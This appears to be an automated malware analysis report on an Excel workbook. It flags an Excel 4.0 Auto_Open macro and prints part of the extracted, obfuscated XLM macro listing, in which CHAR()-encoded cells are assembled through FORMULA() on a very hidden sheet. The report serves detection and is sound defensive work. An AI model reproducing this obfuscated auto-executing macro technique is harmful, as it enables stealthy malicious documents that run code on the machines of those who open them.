Verdict: MALICIOUS
Risk Score: 140

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a known technique for executing malicious code. The macros appear to be constructing strings and formulas that could lead to arbitrary command execution. The presence of the Auto_Open entry and the use of dangerous formula APIs indicate a high likelihood of malicious intent, most plausibly to download and execute a secondary payload.
Heuristics (3)

- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 23296 bytes |

SHA-256: 04e588a894721095d89767811af9bb3be36d34a3f2f9aa1f467707eab2dff51c
Preview script: first 1,000 lines of the extracted script
```text
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - Y8B739FBp
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.CONCAT hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!K1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Y8B739FBp,A1,CHAR(61)&CHAR(73),""
' Y8B739FBp,B1,CHAR(61),""
' Y8B739FBp,C1,CHAR(61),""
' Y8B739FBp,D1,CHAR(61),""
' Y8B739FBp,E1,CHAR(61),""
' Y8B739FBp,F1,CHAR(61),""
' Y8B739FBp,G1,CHAR(61),""
' Y8B739FBp,H1,CHAR(61),""
' Y8B739FBp,I1,CHAR(61)&CHAR(67),""
' Y8B739FBp,J1,CHAR(61)&CHAR(67),""
' Y8B739FBp,K1,"FORMULA(A1&A2&A3&A4&A5&A6&A7&A8&A9&A10&A11&A12&A13&A14&A15&A16&A17&A18&A19&A20&A21&A22&A23&A24&A25&A26&A27&A28&A29&A30&A31&A32&A33&A34&A35&A36&A37&A38&A39&A40&A41,L1)",""
' Y8B739FBp,A2,CHAR(70),""
' Y8B739FBp,B2,CHAR(73),""
' Y8B739FBp,C2,CHAR(73),""
' Y8B739FBp,D2,CHAR(73),""
' Y8B739FBp,E2,CHAR(73),""
' Y8B739FBp,F2,CHAR(67),""
' Y8B739FBp,G2,CHAR(73),""
' Y8B739FBp,H2,CHAR(65),""
' Y8B739FBp,I2,CHAR(65),""
' Y8B739FBp,J2,CHAR(76),""
' Y8B739FBp,K2,"FORMULA(B1&B2&B3&B4&B5&B6&B7&B8&B9&B10&B11&B12&B13&B14&B15&B16&B17&B18&B19&B20&B21&B22&B23&B24&B25&B26&B27&B28&B29&B30&B31&B32&B33&B34&B35&B36&B37&B38&B39&B40&B41,L2)",""
' Y8B739FBp,A3,CHAR(40),""
' Y8B739FBp,B3,CHAR(70),""
' Y8B739FBp,C3,CHAR(70),""
' Y8B739FBp,D3,CHAR(70),""
' Y8B739FBp,E3,CHAR(70),""
' Y8B739FBp,F3,CHAR(65),""
' Y8B739FBp,G3,CHAR(70)&CHAR(40),""
' Y8B739FBp,H3,CHAR(76),""
' Y8B739FBp,I3,CHAR(76),""
' Y8B739FBp,J3,CHAR(79),""
' Y8B739FBp,K3,"FORMULA(C1&C2&C3&C4&C5&C6&C7&C8&C9&C10&C11&C12&C13&C14&C15&C16&C17&C18&C19&C20&C21&C22&C23&C24&C25&C26&C27&C28&C29&C30&C31&C32&C33&C34&C35,L3)",""
' Y8B739FBp,A4,CHAR(71),""
' Y8B739FBp,B4,CHAR(40)&CHAR(71),""
' Y8B739FBp,C4,CHAR(40)&CHAR(71),""
' Y8B739FBp,D4,CHAR(40),""
' Y8B739FBp,E4,CHAR(40),""
' Y8B739FBp,F4,CHAR(76),""
' Y8B739FBp,G4,CHAR(82),""
' Y8B739FBp,H4,CHAR(69),""
' Y8B739FBp,I4,CHAR(76),""
' Y8B739FBp,J4,CHAR(83),""
' Y8B739FBp,K4,"FORMULA(D1&D2&D3&D4&D5&D6&D7&D8&D9&D10&D11&D12&D13&D14&D15&D16&D17&D18&D19&D20&D21&D22&D23&D24&D25&D26&D27&D28&D29&D30&D31&D32&D33&D34&D35,L4)",""
' Y8B739FBp,A5,CHAR(69),""
' Y8B739FBp,B5,CHAR(69),""
' Y8B739FBp,C5,CHAR(69),""
' Y8B739FBp,D5,CHAR(71)&CHAR(69),""
' Y8B739FBp,E5,CHAR(73)&CHAR(83),""
' Y8B739FBp,F5,CHAR(76)&CHAR(40),""
' Y8B739FBp,G5,CHAR(91),""
' Y8B739FBp,H5,CHAR(82),""
' Y8B739FBp,I5,CHAR(40),""
' Y8B739FBp,J5,CHAR(69),""
' Y8B739FBp,K5,"FORMULA(E1&E2&E3&E4&E5&E6&E7&E8&E9&E10&E11&E12&E13&E14&E15&E16&E17&E18&E19&E20&E21&E22&E23&E24&E25&E26&E27&E28&E29&E30&E31&E32&E33&E34&E35&E36&E37&E38&E39&E40&E41&E42&E43&E44&E45&E46&E47&E48&E49&E50&E51&E52&E53&E54&E55&E56&E57&E58&E59&E60&E61&E62&E63,L5)",""
' Y8B739FBp,A6,CHAR(84),""
' Y8B739FBp,B6,CHAR(84),""
' Y8B739FBp,C6,CHAR(84),""
' Y8B739FBp,D6,CHAR(84),""
' Y8B739FBp,E6,CHAR(78),""
' Y8B739FBp,F6,CHAR(34),""
' Y8B739FBp,G6,CHAR(45),""
' Y8B739FBp,H6,CHAR(84)&CHAR(40),""
' Y8B739FBp,I6,CHAR(34),""
' Y8B739FBp,J6,CHAR(40)&CHAR(70),""
' Y8B739FBp,K6,"FORMULA(F1&F2&F3&F4&F5&F6&F7&F8&F9&F10&F11&F12&F13&F14&F15&F16&F17&F18&F19&F20&F21&F22&F23&F24&F25&F26&F27&F28&F29&F30&F31&F32&F33&F34&F35&F36&F37&F38&F39&F40&F41&F42&F43&F44&F45&F46&F47&F48&F49&F50&F51&F52&F53&F54&F55&F56&F57&F58&F59&F60&F61&F62&F63&F64&F65&F66&F67&F68&F69&F70&F71&F72&F73&F74&F75&F76&F77&F78&F79&F80&F81&F82&F83&F84&F85&F86&F87&F88&F89&F90&F91&F92&F93&F94&F95&F96&F97&F98&F99&F100&F101&F102&F103&F104&F105&F106&F107&F108&F109&F110&F111&F112&F113&F114&F115&F116,L6)",""
' Y8B739FBp,A7,CHAR(46),""
' Y8B739FBp,B7,CHAR(46),""
' Y8B739FBp,C7,CHA ... (truncated)
```